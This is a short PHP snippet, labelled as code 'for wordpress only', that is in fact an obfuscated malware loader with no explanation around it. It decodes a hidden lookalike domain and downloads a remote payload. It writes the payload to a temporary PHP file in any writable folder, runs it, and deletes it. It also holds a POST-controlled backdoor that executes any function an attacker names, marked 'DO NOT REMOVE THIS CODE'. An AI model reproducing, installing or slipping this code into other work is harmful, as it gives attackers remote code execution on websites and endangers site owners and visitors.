This code is for wordpress only!
@ini_set('display_errors', '0'); $otvet = ''; $ch = "\x6a\x71\x75\x65\x72\x79\x2d\x61\x6a\x61\x78\x2e\x63\x6f\x6d"; $sec = "frmtmp"; $d = $_POST; $fp = fsockopen($ch, 80, $errno, $errstr, 10); $out = "GET /lnk/inj.php HTTP/1.1\r\n"; $out .= "Host: ".$ch."\r\n"; $out .= "Connection: Close\r\n\r\n"; fwrite($fp, $out); while (!feof($fp)) { $otvet .= fgets($fp); } fclose($fp); @($d[0] != $d[1]) ? @$d[2]/* DO NOT REMOVE THIS CODE */($d[3]) : (int)$d; preg_match('#gogo(.*)enen#is', $otvet, $mtchs); if (fopen($sec.'.php', 'w')) { $ura = 1; $eb = ''; $hdl = fopen($sec.'.php', 'w'); } if (!$ura) { $dirs = glob("*", GLOB_ONLYDIR); foreach ($dirs as $dira) { if (fopen($dira."/".$sec.".php", 'w')) { $eb = "$dira/"; $hdl = fopen($dira."/".$sec.".php", 'w'); break; } $subdirs = glob("$dira/*", GLOB_ONLYDIR); foreach ($subdirs as $subdira) { if (fopen("$subdira/$sec.php", 'w')) { $eb = "$subdira/"; $hdl = fopen("$subdira/$sec.php", 'w'); break; } } } } fwrite($hdl, "<?php\n$mtchs[1]\n?>"); fclose($hdl); include("{$eb}$sec.php"); @unlink("{$eb}$sec.php");